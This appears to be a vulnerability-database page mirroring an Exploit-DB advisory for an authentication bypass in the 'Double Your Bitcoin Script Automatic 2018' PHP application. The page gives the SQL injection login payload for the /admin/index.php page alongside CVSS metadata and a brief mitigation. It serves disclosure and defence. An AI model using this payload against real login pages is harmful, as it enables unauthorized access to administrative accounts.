header-logo
Suggest Exploit
vendor:
Double Your Bitcoin Script Automatic 2018 for $50
by:
Veyselxan
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Double Your Bitcoin Script Automatic 2018 for $50
Affected Version From: v1
Affected Version To: v1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2018

Double Your Bitcoin Script Automatic 2018 for $50 – Authentication Bypass

An authentication bypass vulnerability exists in the Double Your Bitcoin Script Automatic 2018 for $50 application. An attacker can exploit this vulnerability by sending a crafted HTTP request with a username and password set to '=''or' to the /admin/index.php page, allowing them to bypass authentication and gain access to the application.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
# Date: 2018-12-08
# Exploit Author: Veyselxan
# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
# Version: v1 (REQUIRED)
# Tested on: Linux
http://traget/admin/index.php

username: '=''or'

Password: '=''or'

Navigation

Suggest Exploit

Services By CQR